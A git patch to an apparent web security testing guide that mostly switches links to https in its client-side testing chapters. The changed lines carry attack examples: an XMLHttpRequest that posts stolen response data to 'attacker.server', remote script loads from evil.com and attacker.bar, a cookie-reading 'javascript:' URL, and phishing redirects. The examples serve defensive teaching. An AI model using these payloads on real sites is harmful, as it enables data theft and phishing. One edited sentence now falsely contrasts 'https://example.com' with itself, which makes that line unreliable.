a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md index ce9dffc197..ac36988f73 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.md @@ -96,4 +96,3 @@ For measures to prevent DOM-based XSS, see the [DOM-based XSS Prevention Cheat S ## References - [DomXSSWiki](https://github.com/wisec/domxsswiki/wiki/) -- [DOM XSS article by Amit Klein](http://www.webappsec.org/projects/articles/071105.html) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection.md index 8ee457c3b7..5aa9590b43 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/03-Testing_for_HTML_Injection.md @@ -31,7 +31,7 @@ document.write("

Hello, " + user +"

"); In both examples, this vulnerability can be exploited with an input such as: ```text -http://vulnerable.site/page.html?user= +https://vulnerable.site/page.html?user= ``` This input will add an image tag to the page that will execute arbitrary JavaScript code inserted by the malicious user in the HTML context. @@ -42,7 +42,7 @@ This input will add an image tag to the page that will execute arbitrary JavaScr ## How to Test -Consider the following DOM XSS exercise +Consider the following DOM XSS exercise The HTML code contains the following script: diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect.md index 7578f455bf..b13c848106 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect.md @@ -15,7 +15,7 @@ This vulnerability may enable an attacker to successfully launch a phishing scam Here is an example of a phishing attack URL. ```text -http://www.target.site?#redirect=www.fake-target.site +https://www.target.site?#redirect=www.fake-target.site ``` The victim that visits this URL will be automatically redirected to `fake-target.site`, where an attacker could place a fake page that resembles the intended site, in order to steal the victim's credentials. @@ -34,7 +34,7 @@ When testers manually check for this type of vulnerability, they first identify ```js var redir = location.hash.substring(1); if (redir) { - window.location='http://'+decodeURIComponent(redir); + window.location='https://'+decodeURIComponent(redir); } ``` @@ -43,7 +43,7 @@ In this example, the script does not perform any validation of the variable `red This implies that an attacker could redirect the victim to a malicious site simply by submitting the following query string: ```text -http://www.victim.site/?#www.malicious.site +https://www.victim.site/?#www.malicious.site ``` With a slight modification, the above example snippet can be vulnerable to JavaScript injection. @@ -58,7 +58,7 @@ if (redir) { This can be exploited by submitting the following query string: ```text -http://www.victim.site/?#javascript:alert(document.cookie) +https://www.victim.site/?#javascript:alert(document.cookie) ``` When testing for this vulnerability, consider that some characters are treated differently by different browsers. For reference, see [DOM-based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS). diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/05-Testing_for_CSS_Injection.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/05-Testing_for_CSS_Injection.md index b4ee9d8322..30fc9b5836 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/05-Testing_for_CSS_Injection.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/05-Testing_for_CSS_Injection.md @@ -44,7 +44,7 @@ Here is an example of code that attempts to select an input with a `name` matchi ```html ``` @@ -76,8 +76,7 @@ The above code contains a source `location.hash`, controlled by the attacker, th The following pages provide examples of CSS injection vulnerabilities: -- [Password "cracker" via CSS and HTML5](http://html5sec.org/invalid/?length=25) -- [CSS attribute reading](http://eaea.sirdarckcat.net/cssar/v2/) +- [Password "cracker" via CSS and HTML5](https://html5sec.org/invalid/?length=25) - [JavaScript based attacks using `CSSStyleDeclaration` with unescaped input](https://github.com/wisec/domxsswiki/wiki/CSS-Text-sink) For further OWASP resources on preventing CSS injection, see the [Securing Cascading Style Sheets Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html). diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.md index 3dc6afe4aa..48a705aa17 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/06-Testing_for_Client-side_Resource_Manipulation.md @@ -22,7 +22,7 @@ The following JavaScript code shows a possible vulnerable script in which an att An attacker could target a victim by causing them to visit this URL: -`www.victim.com/#http://evil.com/js.js` +`www.victim.com/#https://evil.com/js.js` Where `js.js` contains: @@ -57,13 +57,13 @@ Here is an example of a vulnerable page: The `location.hash` is controlled by user input and is used for requesting an external resource, which will then be reflected through the construct `innerHTML`. An attacker could ask a victim to visit the following URL: -`www.victim.com/#http://evil.com/html.html` +`www.victim.com/#https://evil.com/html.html` With the payload handler for `html.html`: ```html ``` diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md index 6af4c650a7..6f56110cd3 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/07-Testing_Cross_Origin_Resource_Sharing.md @@ -86,12 +86,12 @@ If a response contains sensitive data, an attacker can steal it through the usag if (this.readyState == 4 && this.status == 200) { var xhr2 = new XMLHttpRequest(); // attacker.server: attacker listener to steal response - xhr2.open("POST", "http://attacker.server", true); + xhr2.open("POST", "https://attacker.server", true); xhr2.send(xhr.responseText); } }; // victim.site: vulnerable server with `Access-Control-Allow-Origin: *` header - xhr.open("GET", "http://victim.site", true); + xhr.open("GET", "https://victim.site", true); xhr.send(); @@ -115,7 +115,7 @@ In this example, all the requests from the subdomains of example.com will be all GET /test.php HTTP/1.1 Host: example.com [...] -Origin: http://example.com.attacker.com +Origin: https://example.com.attacker.com Cookie: ``` @@ -124,7 +124,7 @@ When the request above is sent, if the following response is returned with the ` ```http HTTP/1.1 200 OK [...] -Access-Control-Allow-Origin: http://example.com.attacker.com +Access-Control-Allow-Origin: https://example.com.attacker.com Access-Control-Allow-Credentials: true Content-Length: 4 Content-Type: application/xml @@ -164,15 +164,15 @@ Vulnerable code: For example, a request like this will show the contents of the `profile.php` file: -`http://example.foo/main.php#profile.php` +`https://example.foo/main.php#profile.php` -Request and response generated by `http://example.foo/profile.php`: +Request and response generated by `https://example.foo/profile.php`: ```html GET /profile.php HTTP/1.1 Host: example.foo [...] -Referer: http://example.foo/main.php +Referer: https://example.foo/main.php Connection: keep-alive HTTP/1.1 200 OK @@ -186,17 +186,17 @@ Content-Type: text/html Now, as there is no URL validation we can inject a remote script, that will be injected and executed in the context of the `example.foo` domain, with a URL like this: ```text -http://example.foo/main.php#http://attacker.bar/file.php +https://example.foo/main.php#https://attacker.bar/file.php ``` -Request and response generated by `http://attacker.bar/file.php`: +Request and response generated by `https://attacker.bar/file.php`: ```html GET /file.php HTTP/1.1 Host: attacker.bar [...] -Referer: http://example.foo/main.php -origin: http://example.foo +Referer: https://example.foo/main.php +origin: https://example.foo HTTP/1.1 200 OK [...] diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing.md index c54609e47b..1009f1a751 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/08-Testing_for_Cross_Site_Flashing.md @@ -29,7 +29,7 @@ SWFs have the capability to navigate the browser. If the SWF takes the destinati In the Flash case, the malicious URL might look like: ```text -http://trusted.example.org/trusted.swf?getURLValue=http://www.evil-spoofing-website.org/phishEndUsers.html +https://trusted.example.org/trusted.swf?getURLValue=https://www.evil-spoofing-website.org/phishEndUsers.html ``` In the above example, an end user might see that the URL begins with their favorite trusted website and click on it. The link would load the trusted SWF which takes the `getURLValue` and provides it to an ActionScript browser navigation call: @@ -59,7 +59,7 @@ Since May 2007, three new versions of Flash Player were released by Adobe. Every ## How to Test -Since the first publication of [Testing Flash Applications](http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf), new versions of Flash Player were released in order to mitigate some of the attacks which will be described. Nevertheless, some issues still remain exploitable because they are the result of insecure programming practices. +Since the first publication of "Testing Flash Applications", new versions of Flash Player were released in order to mitigate some of the attacks which will be described. Nevertheless, some issues still remain exploitable because they are the result of insecure programming practices. ### Decompilation @@ -89,7 +89,7 @@ codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#ve FlashVars can also be initialized from the URL: -`http://www.example.org/somefilename.swf?var1=val1&var2=val2` +`https://www.example.org/somefilename.swf?var1=val1&var2=val2` In ActionScript 3.0, a developer must explicitly assign the FlashVar values to local variables. Typically, this looks like: @@ -101,7 +101,7 @@ var var2:String = String(paramObj["var2"]); In ActionScript 2.0, any uninitialized global variable is assumed to be a FlashVar. Global variables are those variables that are prepended by `_root`, `_global` or `_level0`. This means that if an attribute like `_root.varname` is undefined throughout the code flow, it could be overwritten by URL parameters: -`http://victim/file.swf?varname=value` +`https://victim/file.swf?varname=value` Regardless of whether you are looking at ActionScript 2.0 or ActionScript 3.0, FlashVars can be a vector of attack. Let's look at some ActionScript 2.0 code that is vulnerable: @@ -137,7 +137,7 @@ movieClip 328 __Packages.Locale { The above code could be attacked by requesting: -`http://victim/file.swf?language=http://evil.example.org/malicious.xml?` +`https://victim/file.swf?language=https://evil.example.org/malicious.xml?` ### Unsafe Methods @@ -165,7 +165,7 @@ Unsafe Methods since version r47 are: The swf file should be hosted on the victim's host, and the techniques of reflected XSS must be used. An attacker forces the browser to load a pure swf file directly in the location bar (by redirection or social engineering) or by loading it through an iframe from an evil page: ```html - + ``` In this situation, the browser will self-generate an HTML page as if it were hosted by the victim host. @@ -185,7 +185,7 @@ navigateToURL(request); Then this will mean it's possible to call JavaScript in the same domain where the movie is hosted by requesting: -`http://victim/file.swf?URI=javascript:evilcode` +`https://victim/file.swf?URI=javascript:evilcode` `getURL('javascript:evilcode','_self');` @@ -213,7 +213,7 @@ loadMovie(_root.URL) by requesting: -`http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode` +`https://victim/file.swf?URL=asfunction:getURL,javascript:evilcode` ### ExternalInterface @@ -258,7 +258,7 @@ Some attack examples with `` tag: An image tag could be used as well: ```html - + ``` In this example, `.swf` is necessary to bypass the Flash Player internal filter: @@ -272,6 +272,5 @@ Since the release of Flash Player 9.0.124.0, XSS is no longer exploitable, but G The following tools may be helpful in working with SWF: - [OWASP SWFIntruder](https://wiki.owasp.org/index.php/Category:SWFIntruder) -- [Decompiler – Flare](http://www.nowrap.de/flare.html) -- [Disassembler – Flasm](http://flasm.sourceforge.net/) +- [Disassembler – Flasm](https://flasm.sourceforge.net/) - [Swfmill – Convert Swf to XML and vice versa](https://www.swfmill.org/) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.md index 5421e4a447..29521cdc79 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking.md @@ -32,15 +32,15 @@ As mentioned above, this type of attack is often designed to allow an attacker t ### Load Target Web Page on a HTML Interpreter Using HTML iframe Tag -Sites that do not protected against frame busting are vulnerable to clickjacking attack. If the `http://www.target.site` web page is successfully loaded into a frame, then the site is vulnerable to Clickjacking. An example of HTML code to create this testing web page is displayed in the following snippet: +Sites that do not protected against frame busting are vulnerable to clickjacking attack. If the `https://www.target.site` web page is successfully loaded into a frame, then the site is vulnerable to Clickjacking. An example of HTML code to create this testing web page is displayed in the following snippet: -```html +```htmls Clickjack test web page - + ``` @@ -58,7 +58,7 @@ With HTML5 a new attribute called "sandbox" is available. It enables a set of re Example: ```html - + ``` ### Test Application on Compatibility and Accessibility Mode diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md index f452b44029..3608e4b2be 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md @@ -76,6 +76,6 @@ Gray-box testing is similar to black-box testing. In gray-box testing, the pen-t - [HTML5 Rocks - Introducing WebSockets: Bringing Sockets to the Web](https://www.html5rocks.com/en/tutorials/websockets/basics/) - [W3C - The WebSocket API](https://html.spec.whatwg.org/multipage/web-sockets.html#network) - [IETF - The WebSocket Protocol](https://tools.ietf.org/html/rfc6455) -- [Christian Schneider - Cross-Site WebSocket Hijacking (CSWSH)](http://www.christian-schneider.net/CrossSiteWebSocketHijacking.html) -- [Robert Koch- On WebSockets in Penetration Testing](http://www.ub.tuwien.ac.at/dipl/2013/AC07815487.pdf) -- [DigiNinja - ZAP and Web Sockets](http://www.digininja.org/blog/zap_web_sockets.php) +- [Christian Schneider - Cross-Site WebSocket Hijacking (CSWSH)](https://www.christian-schneider.net/blog/cross-site-websocket-hijacking/) +- [Robert Koch- On WebSockets in Penetration Testing](https://repositum.tuwien.at/retrieve/21955) +- [DigiNinja - ZAP and Web Sockets](https://digi.ninja/blog/zap_web_sockets.php diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/11-Testing_Web_Messaging.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/11-Testing_Web_Messaging.md index 93e18556fe..83cdbf3b54 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/11-Testing_Web_Messaging.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/11-Testing_Web_Messaging.md @@ -21,7 +21,7 @@ There are some security concerns when using `*` as the domain that we discuss be Here is an example of the messaging API in use. To send a message: ```js -iframe1.contentWindow.postMessage("Hello world","http://www.example.com"); +iframe1.contentWindow.postMessage("Hello world","https://www.example.com"); ``` To receive a message: @@ -39,7 +39,7 @@ function handler(event) { ### Origin Security -The origin is made up of a scheme, host name, and port. It uniquely identifies the domain sending or receiving the message, and does not include the path or the fragment part of the URL. For instance, `https://example.com` will be considered different from `http://example.com` because the schema of the former is `https`, while the latter is `http`. This also applies to web servers running in the same domain but on different ports. +The origin is made up of a scheme, host name, and port. It uniquely identifies the domain sending or receiving the message, and does not include the path or the fragment part of the URL. For instance, `https://example.com` will be considered different from `https://example.com` because the schema of the former is `https`, while the latter is `http`. This also applies to web servers running in the same domain but on different ports. ## Test Objectives diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/13-Testing_for_Cross_Site_Script_Inclusion.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/13-Testing_for_Cross_Site_Script_Inclusion.md index 21bb089a8f..7bba63b6ec 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/13-Testing_for_Cross_Site_Script_Inclusion.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/13-Testing_for_Cross_Site_Script_Inclusion.md @@ -148,14 +148,14 @@ In this example, using the `___` columns as injection points and inserting JavaS // steal data } - + ``` ### 4. Sensitive Data Leakage via JavaScript Runtime Errors -Browsers normally present standardized [JavaScript error messages](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors). However, in the case of IE9/10, runtime error messages provided additional details that could be used to leak data. For example, a website `victim.com` serves the following content at the URI `http://victim.com/service/csvendpoint` for authenticated users: +Browsers normally present standardized [JavaScript error messages](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors). However, in the case of IE9/10, runtime error messages provided additional details that could be used to leak data. For example, a website `victim.com` serves the following content at the URI `https://victim.com/service/csvendpoint` for authenticated users: ```text HTTP/1.1 200 OK @@ -172,7 +172,7 @@ This vulnerability could be exploited with the following: - + ``` When the browser tries to render the CSV content as JavaScript, it fails and leaks the sensitive data: @@ -219,6 +219,6 @@ The sensitive data can be leaked with the following JavaScript code: div.innerHTML = resultString; }; - + ... ``` diff --git a/document/5-Reporting/02-Naming_Schemes.md b/document/5-Reporting/02-Naming_Schemes.md index 73f173d976..1fe9a02e5e 100644 --- a/document/5-Reporting/02-Naming_Schemes.md +++ b/document/5-Reporting/02-Naming_Schemes.md @@ -20,7 +20,7 @@ Each `SWID` tag is represented as a standardized XML format. A `SWID` tag is com ```xml Date: Mon, 16 Dec 2024 20:34:02 -0500 Subject: [PATCH 2/2] Fixes --- REST_CS_Migrate.md | 2 +- .../11-Client-side_Testing/10-Testing_WebSockets.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/REST_CS_Migrate.md b/REST_CS_Migrate.md index 49c17915d5..04480b0448 100644 --- a/REST_CS_Migrate.md +++ b/REST_CS_Migrate.md @@ -65,4 +65,4 @@ Lastly, when [fuzzing](https://owasp.org/www-community/Fuzzing), don't forget to ## Related Resources - [REST Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html) - the other side of this cheat sheet -- [RESTful services, web security blind spot](https://xiom.com/2016/10/31/restful-services-web-security-blind-spot/) - a presentation (including video) elaborating on most of the topics on this cheat sheet. +- [RESTful services, web security blind spot](https://www.youtube.com/watch?v=pWq4qGLAZHI) - avideo presentation elaborating on most of the topics on this cheat sheet. diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md index 3608e4b2be..4050326850 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets.md @@ -78,4 +78,4 @@ Gray-box testing is similar to black-box testing. In gray-box testing, the pen-t - [IETF - The WebSocket Protocol](https://tools.ietf.org/html/rfc6455) - [Christian Schneider - Cross-Site WebSocket Hijacking (CSWSH)](https://www.christian-schneider.net/blog/cross-site-websocket-hijacking/) - [Robert Koch- On WebSockets in Penetration Testing](https://repositum.tuwien.at/retrieve/21955) -- [DigiNinja - ZAP and Web Sockets](https://digi.ninja/blog/zap_web_sockets.php +- [DigiNinja - ZAP and Web Sockets](https://digi.ninja/blog/zap_web_sockets.php)